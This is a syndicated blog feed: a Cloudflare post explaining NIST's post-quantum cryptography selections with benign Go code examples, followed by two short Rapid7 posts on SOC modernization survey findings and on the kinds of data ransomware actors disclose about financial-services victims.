NIST’s pleasant post-quantum surprise

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/nist-post-quantum-surprise/

On Tuesday, the US National Institute of Standards and Technology (NIST) announced which post-quantum cryptography they will standardize. We were already drafting this post with an educated guess on the choice NIST would make. We almost got it right, except for a single choice we didn’t expect—and which changes everything.

At Cloudflare, post-quantum cryptography is a topic close to our heart, as the future of a secure and private Internet is on the line. We have been working towards this day for many years, by implementing post-quantum cryptography, contributing to standards, and testing post-quantum cryptography in practice, and we are excited to share our perspective.

In this long blog post, we explain how we got here, what NIST chose to standardize, what it will mean for the Internet, and what you need to know to get started with your own post-quantum preparations.

How we got here

Shor’s algorithm

Our story starts in 1994, when mathematician Peter Shor discovered a marvelous algorithm that efficiently factors numbers and computes discrete logarithms. With it, you can break nearly all public-key cryptography deployed today, including RSA and elliptic curve cryptography. Luckily, Shor’s algorithm doesn’t run on just any computer: it needs a quantum computer. Back in 1994, quantum computers existed only on paper.

But in the years since, physicists started building actual quantum computers. Initially, these machines were (and still are) too small and too error-prone to be threatening to the integrity of public-key cryptography, but there is a clear and impending danger: it only seems a matter of time now before a quantum computer is built that has the capability to break public-key cryptography. So what can we do?

Encryption, key agreement and signatures

To understand the risk, we need to distinguish between the three cryptographic primitives that are used to protect your connection when browsing on the Internet:

Symmetric encryption. With a symmetric cipher, the same key is used to encrypt and decrypt a message. Symmetric ciphers are the workhorse of cryptography: they’re fast, well understood, and luckily, as far as we know, secure against quantum attacks. (We’ll touch on this later when we get to security levels.) Examples are AES and ChaCha20.
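For a feel of what this looks like in practice, here is a minimal Go sketch of authenticated symmetric encryption with AES-GCM from the standard library. (The shared key here is freshly random; as the next paragraph explains, agreeing on that key is the hard part.)

package main

import (
  "crypto/aes"
  "crypto/cipher"
  "crypto/rand"
  "fmt"
)

func main() {
  // A 128-bit key that both parties somehow already share.
  key := make([]byte, 16)
  if _, err := rand.Read(key); err != nil {
    panic(err)
  }

  block, err := aes.NewCipher(key)
  if err != nil {
    panic(err)
  }
  aead, err := cipher.NewGCM(block)
  if err != nil {
    panic(err)
  }

  // A fresh nonce for every message encrypted under the same key.
  nonce := make([]byte, aead.NonceSize())
  if _, err := rand.Read(nonce); err != nil {
    panic(err)
  }

  ciphertext := aead.Seal(nil, nonce, []byte("hello"), nil)
  plaintext, err := aead.Open(nil, nonce, ciphertext, nil)
  fmt.Println(string(plaintext), err) // hello <nil>
}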

Symmetric encryption alone is not enough: which key do we use when visiting a website for the first time? We can’t just pick a random key and send it along in the clear, as then anyone surveilling that session would know that key as well. You’d think it’s impossible to communicate securely without ever having met, but there is some clever math to solve this.

Key agreement, also called a key exchange, allows two parties that never met to agree on a shared key. Even if someone is snooping, they are not able to figure out the agreed key. Examples include Diffie–Hellman over elliptic curves, such as X25519.

The key agreement prevents a passive observer from reading the contents of a session, but it doesn’t help defend against an attacker who sits in the middle and does two separate key agreements: one with you and one with the website you want to visit. To solve this, we need the final piece of cryptography:

Digital signatures, such as RSA, allow you to check that you’re actually talking to the right website with a chain of certificates going up to a certificate authority.
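In Go, minting and checking such a signature with the standard library’s Ed25519 takes just a few lines; this is the classical scheme we’ll later be looking to replace:

package main

import (
  "crypto/ed25519"
  "crypto/rand"
  "fmt"
)

func main() {
  pub, priv, err := ed25519.GenerateKey(rand.Reader)
  if err != nil {
    panic(err)
  }

  msg := []byte("handshake transcript")
  sig := ed25519.Sign(priv, msg)

  // Anyone holding the public key can check the signature.
  fmt.Println(ed25519.Verify(pub, msg, sig)) // true
}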

Shor’s algorithm breaks all widely deployed key agreement and digital signature schemes, which are both critical to the security of the Internet. However, the urgency and mitigation challenges between them are quite different.

Impact

Most signatures on the Internet have a relatively short lifespan. If we replace them before quantum computers can crack them, we’re golden. We shouldn’t be too complacent here: signatures aren’t that easy to replace as we will see later on.

More urgently, though, an attacker can store traffic today and decrypt later by breaking the key agreement using a quantum computer. Everything that’s sent on the Internet today (personal information, credit card numbers, keys, messages) is at risk.

NIST Competition

Luckily cryptographers took note of Shor’s work early on and started working on post-quantum cryptography: cryptography not broken by quantum algorithms. In 2016, NIST, known for standardizing AES and SHA, opened a public competition to select which post-quantum algorithms they will standardize. Cryptographers from all over the world submitted algorithms and publicly scrutinized each other’s submissions. To focus attention, the list of potential candidates was whittled down over three rounds. From the original 82 submissions, eight made it into the final third round. From those eight, NIST chose one key agreement scheme and three signature schemes. Let’s have a look at the key agreement first.

What NIST announced

Key agreement

For key agreement, NIST picked only Kyber, which is a Key Encapsulation Mechanism (KEM). Let’s compare it side-by-side to an RSA-based KEM and the X25519 Diffie–Hellman key agreement:

Performance characteristics of Kyber and RSA. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only.
Performance characteristics of the X25519 Diffie–Hellman key agreement commonly used in TLS 1.3.
KEM versus Diffie–Hellman

To properly compare these numbers, we have to explain how KEM and Diffie–Hellman key agreements are different.

Protocol flow of KEM and Diffie-Hellman key agreement.

Let’s start with the KEM. A KEM is essentially a Public-Key Encryption (PKE) scheme tailored to encrypt shared secrets. To agree on a key, the initiator, typically the client, generates a fresh keypair and sends the public key over. The receiver, typically the server, generates a shared secret and encrypts (“encapsulates”) it for the initiator’s public key. It returns the ciphertext to the initiator, who finally decrypts (“decapsulates”) the shared secret with its private key.
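Here is that flow in Go using Kyber512 from our CIRCL library. This is a sketch against the generic KEM interface CIRCL exposes; check the package documentation for the exact API of the version you use.

package main

import (
  "bytes"
  "fmt"

  "github.com/cloudflare/circl/kem/kyber/kyber512"
)

func main() {
  scheme := kyber512.Scheme()

  // Initiator: generate a fresh keypair and send pk to the receiver.
  pk, sk, err := scheme.GenerateKeyPair()
  if err != nil {
    panic(err)
  }

  // Receiver: encapsulate a fresh shared secret to pk and
  // return the ciphertext ct to the initiator.
  ct, ssReceiver, err := scheme.Encapsulate(pk)
  if err != nil {
    panic(err)
  }

  // Initiator: decapsulate ct with sk to recover the same secret.
  ssInitiator, err := scheme.Decapsulate(sk, ct)
  if err != nil {
    panic(err)
  }

  fmt.Println(bytes.Equal(ssInitiator, ssReceiver)) // true
}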

With Diffie–Hellman, both parties generate a keypair. Because of the magic of Diffie–Hellman, there is a unique shared secret between every combination of a public and private key. Again, the initiator sends its public key. The receiver combines the received public key with its own private key to create the shared secret and returns its public key with which the initiator can also compute the shared secret.
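The Diffie–Hellman version of the same exchange, sketched with X25519 from golang.org/x/crypto; both sides end up with the same secret (error handling elided for brevity):

package main

import (
  "bytes"
  "crypto/rand"
  "fmt"

  "golang.org/x/crypto/curve25519"
)

func main() {
  // Each party picks a random private key and derives the
  // matching public key from the curve's base point.
  aPriv, bPriv := make([]byte, 32), make([]byte, 32)
  rand.Read(aPriv)
  rand.Read(bPriv)
  aPub, _ := curve25519.X25519(aPriv, curve25519.Basepoint)
  bPub, _ := curve25519.X25519(bPriv, curve25519.Basepoint)

  // After exchanging public keys, each side combines its own
  // private key with the other's public key.
  ss1, _ := curve25519.X25519(aPriv, bPub)
  ss2, _ := curve25519.X25519(bPriv, aPub)

  fmt.Println(bytes.Equal(ss1, ss2)) // true: the same shared secret
}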

Interactive versus non-interactive key agreement

As an aside, in this simple key agreement (such as in TLS), there is not a big difference between using a KEM or Diffie–Hellman: the number of round-trips is exactly the same. In fact, we’re using Diffie–Hellman essentially as a KEM. This, however, is not the case for all protocols: for instance, the X3DH handshake of Signal can’t be done with plain KEMs and requires the full flexibility of Diffie–Hellman.

Now that we know how to compare KEMs and Diffie–Hellman, how does Kyber measure up?

Kyber

Kyber is a balanced post-quantum KEM. It is very fast: much faster than X25519, which is already known for its speed. Its main drawback, common to many post-quantum KEMs, is that Kyber has relatively large ciphertext and key sizes: compared to X25519 it adds 1,504 bytes. Is this problematic?

We have some indirect data. Back in 2019 together with Google we tested two post-quantum KEMs, NTRU-HRSS and SIKE in Chrome. SIKE has very small keys, but is computationally very expensive. NTRU-HRSS, on the other hand, has similar performance characteristics to Kyber, but is slightly bigger and slower. This is what we found:

Handshake times for TLS with X25519 (control), NTRU-HRSS (CECPQ2) and SIKE (CECPQ2b). Both post-quantum KEMs were combined with an X25519 key agreement.

In this experiment we used a combination (a hybrid) of the post-quantum KEM and X25519. Thus NTRU-HRSS couldn’t benefit from its speed compared to X25519. Even with this disadvantage, the difference in performance is very small. Thus we expect that switching to a hybrid of Kyber and X25519 will have little performance impact.

So can we switch to post-quantum TLS today? We would love to. However, we have to be a bit careful: some TLS implementations are brittle and crash on the larger KeyShare message that contains the bigger post-quantum keys. We will work hard to find ways to mitigate these issues, as was done to deploy TLS 1.3. Stay tuned!

The other finalists

It’s interesting to have a look at the KEMs that didn’t make the cut. NIST intends to standardize some of these in a fourth round. One reason is to increase the diversity in security assumptions in case there is a breakthrough in attacks on structured lattices on which Kyber is based. Another reason is that some of these schemes have specialized, but very useful applications. Finally, some of these schemes might be standardized outside of NIST.

Structured lattices      Backup        Specialists
NTRU                     BIKE 4️⃣       Classic McEliece 4️⃣
NTRU Prime               HQC 4️⃣        SIKE 4️⃣
SABER                    FrodoKEM

The finalists and candidates of the third round of the competition. The ones marked with 4️⃣ are proceeding to a fourth round and might yet be standardized.

The structured lattice generalists

Just like Kyber, the KEMs SABER, NTRU and NTRU Prime are all structured lattice schemes that are very similar in performance to Kyber. There are some finer differences, but any one of these KEMs would’ve been a great pick. And they still are: OpenSSH 9.0 chose to implement NTRU Prime.

The backup generalists

BIKE, HQC and FrodoKEM are also balanced KEMs, but they’re based on three different underlying hard problems. Unfortunately they’re noticeably less efficient, both in key sizes and computation. A breakthrough in the cryptanalysis of structured lattices is possible, though, and in that case it’s nice to have backups. Thus NIST is advancing BIKE and HQC to a fourth round.

While NIST chose not to advance FrodoKEM, which is based on unstructured lattices, Germany’s BSI prefers it.

The specialists

The last group of post-quantum cryptographic algorithms under NIST’s consideration are the specialists. We’re happy that both are advancing to the fourth round as they can be of great value in just the right application.

First up is Classic McEliece: it has rather unbalanced performance characteristics with its large public key (261kB) and small ciphertexts (128 bytes). This makes McEliece unsuitable for the ephemeral key exchange of TLS, where we need to transmit the public key. On the other hand, McEliece is ideal when the public key is distributed out-of-band anyway, as is often the case in applications and mobile apps that pin certificates. To use McEliece in this way, we need to change TLS a bit. Normally the server authenticates itself by sending a signature on the handshake. Instead, the client can encrypt a challenge to the KEM public key of the server. Being able to decrypt it is an implicit authentication. This variation of TLS is known as KEMTLS and also works great with Kyber when the public key isn’t known beforehand.
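To make the implicit authentication concrete, here is a heavily simplified Go sketch (again with CIRCL’s Kyber512, though the same works for McEliece). The real KEMTLS key schedule, transcript hashing, and message framing are omitted; the point is only that decapsulation doubles as authentication.

package main

import (
  "crypto/sha256"
  "fmt"

  "github.com/cloudflare/circl/kem/kyber/kyber512"
)

func main() {
  scheme := kyber512.Scheme()

  // The server's long-term KEM keypair. The client learns
  // serverPK out-of-band (pinned) or from a certificate.
  serverPK, serverSK, err := scheme.GenerateKeyPair()
  if err != nil {
    panic(err)
  }

  // Client: encapsulate a secret to the server's public key and
  // derive a handshake key from it.
  ct, ss, err := scheme.Encapsulate(serverPK)
  if err != nil {
    panic(err)
  }
  clientKey := sha256.Sum256(ss)

  // Server: only the holder of serverSK can recover ss, so being
  // able to speak under the derived key implicitly authenticates
  // the server. No handshake signature is needed.
  ss2, err := scheme.Decapsulate(serverSK, ct)
  if err != nil {
    panic(err)
  }
  serverKey := sha256.Sum256(ss2)

  fmt.Println(clientKey == serverKey) // true
}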

Finally, there is SIKE, which is based on supersingular isogenies. It has very small key and ciphertext sizes. Unfortunately, it is computationally more expensive than the other contenders.

Digital signatures

As we just saw, the situation for post-quantum key agreement isn’t too bad: Kyber, the chosen scheme, is somewhat larger, but it offers computational efficiency in return. The situation for post-quantum signatures is worse: none of the schemes fit the bill on their own, for different reasons. We discussed these issues at length for ten of them in a deep-dive last year. Let’s restrict ourselves for the moment to the schemes that were most likely to be standardized and compare them against Ed25519 and RSA-2048, the schemes in common use today.

Performance characteristics of NIST’s chosen signature schemes compared to Ed25519 and RSA-2048. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only. SPHINCS+ was timed with the “simple” variant of Haraka as the underlying hash function. (*) Falcon requires a suitable double-precision floating-point unit for fast signing.

Floating point: Falcon’s Achilles’ heel

All of these schemes have much larger signatures than those commonly used today. Looking at just these numbers, Falcon is the best of the worst. It, however, has a weakness that this table doesn’t show: it requires fast constant-time double-precision floating-point arithmetic to have acceptable signing performance.

Let’s break that down. Constant time means that the time the operation takes does not depend on the data processed. If the time to create a signature depends on the private key, then the private key can often be recovered by measuring how long it takes to create a signature. Writing constant-time code is hard, but over the years cryptographers have got it figured out for integer arithmetic.
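To make “constant-time” concrete: Go’s standard library ships branch-free helpers for exactly this reason. A naive byte comparison can return early at the first mismatch, leaking via timing how many leading bytes matched; crypto/subtle always examines every byte:

package main

import (
  "crypto/subtle"
  "fmt"
)

func main() {
  mac1 := []byte{0x01, 0x02, 0x03, 0x04}
  mac2 := []byte{0x01, 0x02, 0x03, 0x05}

  // Runs in time independent of where (or whether) the slices
  // differ, unlike a short-circuiting loop.
  if subtle.ConstantTimeCompare(mac1, mac2) == 1 {
    fmt.Println("equal")
  } else {
    fmt.Println("not equal")
  }

  // Branch-free selection: yields x if v == 1 and y if v == 0,
  // without a data-dependent branch that timing could reveal.
  v, x, y := 1, 42, 7
  fmt.Println(subtle.ConstantTimeSelect(v, x, y)) // 42
}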

Falcon, crucially, is the first big cryptographic algorithm to use double-precision floating-point arithmetic. Initially it wasn’t clear at all whether Falcon could be implemented in constant-time, but impressively, Falcon was implemented in constant-time for several different CPUs, which required several clever workarounds for certain CPU instructions.

Despite this achievement, Falcon’s constant-timeness is built on shaky grounds. The next generation of Intel CPUs might add an optimization that breaks Falcon’s constant-timeness. Also, many CPUs today do not even have fast constant-time double-precision operations. And then still, there might be an obscure bug that has been overlooked.

In time we may figure out how to do constant-time arithmetic on the FPU robustly, but for now we feel it’s too early to deploy Falcon where the timing of signature minting can be measured. Notwithstanding, Falcon is a great choice for offline signatures such as those in certificates.

Dilithium’s size

This brings us to Dilithium. Compared to Falcon it’s easy to implement safely and has better signing performance to boot. Its signatures and public keys are much larger though, which is problematic. For example, to each browser visiting this very page, we sent six signatures and two public keys. If we replaced them all with Dilithium2 (a signature weighs 2,420 bytes and a public key 1,312 bytes), we would be looking at 17kB of additional data. Last year, we ran an experiment to see the impact of additional data in the TLS handshake:

Impact of larger signatures on TLS handshake time. For the details, see this blog.

There are some caveats to point out: first, we used a big 30-segment initial congestion window (icwnd). With a normal icwnd, the bump at 40KB moves to 10KB. Secondly, the height of this bump is the round-trip time (RTT), which, due to our broadly distributed network, is very low for us. Thus, switching to Dilithium alone might well double your TLS handshake times. More disturbingly, we saw that some connections stopped working when we added too much data:

Amount of failed TLS handshakes by size of added signatures. For the details, see this blog.

We expect this was caused by misbehaving middleboxes. Taken together, we concluded that early adoption of post-quantum signatures on the Internet would likely be more successful if those six signatures and two public keys would fit in 9KB. This can be achieved by using Dilithium for the handshake signature and Falcon for the other (offline) signatures.

At most one of Dilithium or Falcon

Unfortunately, NIST had stated on several occasions that it intended to standardize at most one of the two structured-lattice signature schemes, Dilithium and Falcon:

Slides of NIST’s status update after the conclusion of round 2

The reason given is that both Dilithium and Falcon are based on structured lattices and thus do not add more security diversity. Because of the difficulty of implementing Falcon correctly, we expected NIST to standardize Dilithium and, as a backup, SPHINCS+. With that guess, we saw a big challenge ahead: to keep the Internet fast, we would need some difficult and rigorous changes to the protocols.

The twist

However, to everyone’s surprise, NIST picked both! NIST chose to standardize Dilithium, Falcon and SPHINCS+. This is a very pleasant surprise for the Internet: it means that post-quantum authentication will be much simpler to adopt.

SPHINCS+, the conservative choice

In the excitement of the fight between Dilithium and Falcon, we could almost forget about SPHINCS+, a stateless hash-based signature. Its big advantage is that its security is based on the second-preimage resistance of the underlying hash-function, which is well understood. It is not a stretch to say that SPHINCS+ is the most conservative choice for a signature scheme, post-quantum or otherwise. But even as a co-submitter of SPHINCS+, I have to admit that its performance isn’t that great.

There is a lot of flexibility in the parameter choices for SPHINCS+: there are tradeoffs between signature size, signing time, verification time, and the maximum number of signatures that can be minted. Of the current parameter sets, the “s” variants are optimized for size and the “f” variants for signing speed; both are chosen to allow 2^64 signatures. NIST has hinted at reducing the signature limit, which would improve performance. A custom choice of parameters for a particular application would improve it even more, but would still trail Dilithium.

Having discussed NIST’s choices, let’s have a look at those that were left out.

The other finalists

There were three other finalists: GeMSS, Picnic and Rainbow. None of these are progressing to a fourth round.

Picnic is a conservative choice similar to SPHINCS+. Its construction is interesting: it is based on the secure multiparty computation of a block cipher. To be efficient, a non-standard block cipher is chosen. This makes Picnic’s assumptions a bit less conservative, which is why NIST preferred SPHINCS+.

GeMSS and Rainbow are specialists: they have large public key sizes (hundreds of kilobytes), but very small signatures (33–66 bytes). They would be great for applications where the public key can be distributed out of band, such as for the Signed Certificate Timestamps included in certificates for Certificate Transparency. Unfortunately, both turned out to be broken.

Signature schemes on the horizon

Although we expect Falcon and Dilithium to be practical for the Internet, there is ample room for improvement. Many new signature schemes have been proposed since the start of the competition, and they could help out a lot. NIST recognizes this and is opening a new competition for post-quantum signature schemes.

A few schemes that have caught our eye already are UOV, which has similar performance trade-offs to those for GeMSS and Rainbow; SQISign, which has small signatures, but is computationally expensive; and MAYO, which looks like it might be a great general-purpose signature scheme.

Stateful hash-based signatures

Finally, we’d be remiss not to mention the post-quantum signature schemes that have already been standardized by NIST: the stateful hash-based signature schemes LMS and XMSS. They share the same conservative security as their sibling SPHINCS+, but have much better performance. The rub is that each keypair has a finite number of signature slots, and each slot can only be used once: if it’s used twice, the scheme is insecure. This is why they are called stateful: the signer must remember which slots have been used in the past, and any mistake is fatal. Keeping that state perfectly can be very challenging.
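The required discipline is easiest to see in code. Below is a hedged sketch of the bookkeeping only: the types and the signing stand-in are hypothetical, and a real deployment must persist the counter atomically and survive crashes.

package main

import (
  "errors"
  "fmt"
)

// statefulSigner sketches the slot bookkeeping that a stateful
// hash-based scheme such as LMS or XMSS demands. Hypothetical
// type: only the state discipline is the point here.
type statefulSigner struct {
  nextSlot uint32 // must be durably persisted, never rolled back
  maxSlots uint32
}

func (s *statefulSigner) Sign(msg []byte) ([]byte, error) {
  if s.nextSlot >= s.maxSlots {
    return nil, errors.New("all signature slots used up")
  }
  slot := s.nextSlot

  // Crucially: advance and persist the counter BEFORE releasing
  // the signature. Crashing after signing but before persisting
  // could reuse a slot, which is fatal to security.
  s.nextSlot++
  // persist(s.nextSlot) // e.g. an fsync'ed write; elided here

  return signWithSlot(slot, msg), nil
}

// signWithSlot stands in for the real one-time signature.
func signWithSlot(slot uint32, msg []byte) []byte {
  return []byte(fmt.Sprintf("sig(slot=%d, msg=%q)", slot, msg))
}

func main() {
  s := &statefulSigner{maxSlots: 4}
  sig, err := s.Sign([]byte("hello"))
  fmt.Println(string(sig), err)
}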

What’s next?

NIST will draft standards for the selected schemes and request public feedback on them. There might be changes to the algorithms, but we do not expect anything major. The standards are expected to be finalized in 2024.

In the coming months, many languages, libraries and protocols will already add preliminary support for the current version of Kyber and the other post-quantum algorithms. We’re helping out to make post-quantum available to the Internet as soon as possible: we’re working within the IETF to add Kyber to TLS and will contribute upstream support to popular open-source libraries.

Start experimenting with Kyber today

Now is a good time for you to try out Kyber in your software stacks. We were lucky to correctly guess Kyber would be picked and have experience running it internally. Our tests so far show it performs great. Your requirements might differ, so try it out yourself.

The reference implementation in C is excellent. The Open Quantum Safe project integrates it with various TLS libraries, but beware: the algorithm identifiers and scheme might still change, so be ready to migrate.

Our CIRCL library has a fast independent implementation of Kyber in Go. We implemented Kyber ourselves so that we could help tease out any implementation bugs or subtle underspecification.

Experimenting with post-quantum signatures

Post-quantum signatures are not as urgent, but might require more engineering to get right. First off, which signature scheme to pick?

  • Are large signatures and slow operations acceptable? Go for SPHINCS+.
  • Do you need more performance?
    • Can your signature generation be timed, for instance when generated on-the-fly? Then go for (a hybrid, see below, with) Dilithium.
    • For offline signatures, go for (a hybrid with) Falcon.
  • If you can keep a state perfectly, check out XMSS/LMS.

Open Quantum Safe can be used to test these out. Our CIRCL library also has a fast independent implementation of Dilithium in Go. We’ll add Falcon and SPHINCS+ soon.

Hybrids

A hybrid is a combination of a classical and a post-quantum scheme. For instance, we can combine Kyber512 with X25519 to create a single Kyber512X key agreement. The advantage of a hybrid is that the data remains secure against non-quantum attackers even if Kyber512 turns out to be broken. It is important to note that it’s not just about the algorithm, but also the implementation: Kyber512 might be perfectly secure, but an implementation might leak via side-channels. The downside is that two key exchanges are performed, which takes more CPU cycles and bytes on the wire. For the moment, we prefer sticking with hybrids, but we will revisit this soon.
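A minimal Go sketch of the combining step, assuming both exchanges have already run. How exactly to combine the secrets is specified per protocol; feeding both into a KDF, as with HKDF below, is the common shape:

package main

import (
  "crypto/sha256"
  "fmt"
  "io"

  "golang.org/x/crypto/hkdf"
)

// combineSecrets derives one session key from the X25519 and
// Kyber512 shared secrets. As long as either input stays secret,
// the derived key does too.
func combineSecrets(x25519SS, kyberSS []byte) ([]byte, error) {
  ikm := append(append([]byte{}, x25519SS...), kyberSS...)
  r := hkdf.New(sha256.New, ikm, nil, []byte("hybrid sketch"))
  key := make([]byte, 32)
  _, err := io.ReadFull(r, key)
  return key, err
}

func main() {
  // Placeholder secrets; in practice these come out of the two
  // key exchanges run side by side.
  key, err := combineSecrets(make([]byte, 32), make([]byte, 32))
  fmt.Printf("%x %v\n", key[:8], err)
}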

Post-quantum security levels

Each algorithm has different parameters targeting various post-quantum security levels. Up till now we’ve only discussed the performance characteristics of security level 1 (or level 2 in the case of Dilithium, which doesn’t have level 1 parameters). The definition of the security levels is rather interesting: they’re defined as being at least as hard to crack, by a classical or quantum attacker, as specific instances of AES and SHA:

Level   Definition: at least as hard to break as …
1       To recover the key of AES-128 by exhaustive search
2       To find a collision in SHA-256 by exhaustive search
3       To recover the key of AES-192 by exhaustive search
4       To find a collision in SHA-384 by exhaustive search
5       To recover the key of AES-256 by exhaustive search

So which security level should we pick? Is level 1 good enough? We’d need to understand how hard it is for a quantum computer to crack AES-128.

Grover’s algorithm

In 1996, two years after Shor’s paper, Lov Grover published his quantum search algorithm. With it, you can find the AES-128 key (given known plaintext and ciphertext) with only 2^64 executions of the cipher in superposition. That sounds much faster than the 2^127 tries on average for a classical brute-force attempt. In fact, it sounds like security level 1 isn’t that secure at all. Don’t be alarmed: level 1 is much more secure than it sounds, but it requires some context.

To start, a classical brute-force attempt can be parallelized: millions of machines can participate, sharing the work. Grover’s algorithm, on the other hand, doesn’t parallelize well: splitting the search over many machines forfeits most of the quadratic speedup, as each machine only gets the square-root advantage on its own share. To wit, a billion quantum computers would still have to do 2^49 iterations each to crack AES-128.

Then each iteration requires many gates. It’s estimated that these 2^49 iterations take roughly 2^64 noiseless quantum gates per machine. If each of our billion quantum computers could execute a billion noiseless quantum gates per second, it would still take around 500 years (2^64 gates at 10^9 gates per second is about 1.8 × 10^10 seconds).

That already sounds more secure, but we’re not done. Quantum computers do not execute noiseless quantum gates: they’re analogue machines, and every operation carries a little bit of noise. Does this mean that quantum computing is hopeless? Not at all! There are clever error-correction algorithms that turn, say, a million noisy qubits into one less noisy qubit. This error correction doesn’t just require extra qubits, but extra gates as well. How much overhead depends very much on the exact details of the quantum computer.

It is not inconceivable that in the future there will be quantum computers that effectively execute far more than a billion noiseless gates per second, but it will likely be decades after Shor’s algorithm is practical. This all is a long-winded way of saying that security level 1 seems solid for the foreseeable future.

Hedging against attacks

A different reason to pick a higher security level is to hedge against better attacks on the algorithm. This makes a lot of sense, but it is important to note that this isn’t a foolproof strategy:

  • Not all attacks are small improvements. It’s possible that improvements in cryptanalysis break all security levels at once.
  • Higher security levels do not protect against implementation flaws, such as (new) timing vulnerabilities.

A different aspect, arguably more important than picking a high security level, is crypto agility: being able to switch to a new algorithm or implementation in case of a break or other trouble. Let’s hope we will not need it, but now that we’re switching anyway, it’s worth making future transitions easier.

CIRCL is Post-Quantum Enabled

We already mentioned CIRCL a few times: it’s our optimized cryptography library for Go, whose development we started in 2019. CIRCL already contains support for several post-quantum algorithms, such as the KEMs Kyber, SIKE, and FrodoKEM, and the signature scheme Dilithium. The code is up to date and compliant with test vectors from the third round. CIRCL is readily usable in Go programs, either as a library or natively as part of Go using this fork.

One goal of CIRCL is to enable experimentation with post-quantum algorithms in TLS. For instance, we ran a measurement study to evaluate the feasibility of the KEMTLS protocol for which we’ve adapted the TLS package of the Go library.

As an example, this code uses CIRCL to sign a message with eddilithium2, a hybrid signature scheme pairing Ed25519 with Dilithium mode 2.

package main

import (
  "crypto"
  "crypto/rand"
  "fmt"

  "github.com/cloudflare/circl/sign/eddilithium2"
)

func main() {
  // Generate a random keypair.
  pk, sk, err := eddilithium2.GenerateKey(rand.Reader)
  if err != nil {
    panic(err)
  }

  // Sign a message.
  msg := []byte("Signed with CIRCL using " + eddilithium2.Scheme().Name())
  signature, err := sk.Sign(rand.Reader, msg, crypto.Hash(0))
  if err != nil {
    panic(err)
  }

  // Verify the signature.
  valid := eddilithium2.Verify(pk, msg, signature[:])

  fmt.Printf("Message: %v\n", string(msg))
  fmt.Printf("Signature (%v bytes): %x...\n", len(signature), signature[:4])
  fmt.Printf("Signature Valid: %v\n", valid)
}
Message: Signed with CIRCL using Ed25519-Dilithium2
Signature (2484 bytes): 84d6882a...
Signature Valid: true

As you can see, the API is the same as the crypto.Signer interface from the standard library. Try it out; we’re happy to hear your feedback.

Conclusion

This is a big moment for the Internet. From a set of excellent options for post-quantum key agreement, NIST chose Kyber. With it, we can secure the data on the Internet today against quantum adversaries of the future, without compromising on performance.

On the authentication side, NIST pleasantly surprised us by choosing both Falcon and Dilithium, despite its earlier statements. This was a great choice, as it will make post-quantum authentication more practical than we expected.

Together with the cryptography community, we have our work cut out for us: we aim to make the Internet post-quantum secure as fast as possible.

Want to follow along? Keep an eye on this blog or have a look at research.cloudflare.com.

Want to help out? We’re hiring and open to research visits.

Today’s SOC Strategies Will Soon Be Inadequate

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/08/todays-soc-strategies-will-soon-be-inadequate/

New research sponsored by Rapid7 explores the momentum behind security operations center (SOC) modernization and the role extended detection and response (XDR) plays. ESG surveyed over 370 IT and cybersecurity professionals in the US and Canada –  responsible for evaluating, purchasing, and utilizing threat detection and response security products and services – and identified key trends in the space.

The first major finding won’t surprise you: Security operations remain challenging.

Cybersecurity is dynamic

A growing attack surface, the volume and complexity of security alerts, and public cloud proliferation add to the intricacy of security operations today. Attacks increased 31% from 2020 to 2021, according to Accenture’s State of Cybersecurity Resilience 2021 report. The number of attacks per company increased from 206 to 270 year over year. The disruptions will continue, ultimately making many current SOC strategies inadequate if teams don’t evolve from reactive to proactive.

In parallel, many organizations are facing tremendous challenges closer to home due to a lack of skilled resources. At the end of 2021, there was a security workforce gap of 377,000 jobs in the US and 2.7 million globally, according to the (ISC)² Cybersecurity Workforce Study. Already-lean teams are experiencing increased workloads, often resulting in burnout or churn.

Key findings on the state of the SOC

In the new ebook, SOC Modernization and the Role of XDR, you’ll learn more about the increasing difficulty in security operations, as well as the other key findings, which include:

  • Security professionals want more data and better detection rules – Despite the massive amount of security data collected, respondents want more scope and diversity.
  • SecOps process automation investments are proving valuable – Many organizations have realized benefits from security process automation, but challenges persist.
  • XDR momentum continues to build – XDR awareness continues to grow, though most see XDR supplementing or consolidating SOC technologies.
  • MDR is mainstream and expanding – Organizations need help from service providers for security operations; 85% use managed services for a portion or a majority of their security operations.

Download the full report to learn more.


For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/07/for-finserv-ransomware-attacks-obtaining-customer-data-is-the-focus/

Welcome back to the third installment of Rapid7’s Pain Points: Ransomware Data Disclosure Trends blog series, where we’re distilling the key highlights of our ransomware data disclosure research paper one industry at a time. This week, we’ll be focusing on the financial services industry, one of the most highly regulated — and frequently attacked — industries we looked at.

Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats, and operationalizes that data automatically with our Threat Command product. We used that data to conduct unique research into the types of data threat actors disclose about their victims. The data points in this research come from the threat actors themselves, making it a rare glimpse into their actions, motivations, and preferences.

Last week, we discussed how the healthcare and pharmaceutical industries are particularly impacted by double extortion in ransomware. We found that threat actors target and release specific types of data to coerce victims into paying the ransom. In this case, it was internal financial information (71%), which was somewhat surprising, considering financial information is not the focus of these two industries. Less surprising, but certainly not less impactful, were the disclosure of customer or patient information (58%) and the unusually strong emphasis on intellectual property in the pharmaceuticals sector of this vertical (43%).

Customer data is the prime target for finserv ransomware

But when we looked at financial services, something interesting did stand out: Customer data was found in the overwhelming majority of data disclosures (82%), not necessarily the company’s internal financial information. It seems threat actors were more interested in leveraging the public’s implied trust in financial services companies to keep their personal financial information private than they were in exposing the company’s own financial information.

Since much of the damage done by ransomware attacks — or really any cybersecurity incident — lies in the erosion of trust in that institution, it appears threat actors are seeking to hasten that erosion with their initial data disclosures. The financial services industry is one of the most highly regulated industries in the market precisely because it holds the financial health of millions of people in its hands. Breaches at these institutions tend to have outsized impacts.

Employee info is also at risk

The next most commonly disclosed form of data in the financial services industry was personally identifiable information (PII) and HR data — the personal data of the people who work in the financial industry, which can include identifying information such as Social Security numbers. Some 59% of disclosures from this sector included this kind of information.

This appears to indicate that threat actors want to undermine the company’s ability to keep their own employees’ data safe, and that can be corroborated by another data point: In some 29% of cases, data disclosure pointed to reconnaissance for future IT attacks as the motive. Threat actors want financial services companies and their employees to know that they are and will always be a major target. Other criminals can use information from these disclosures, such as credentials and network maps, to facilitate future attacks.

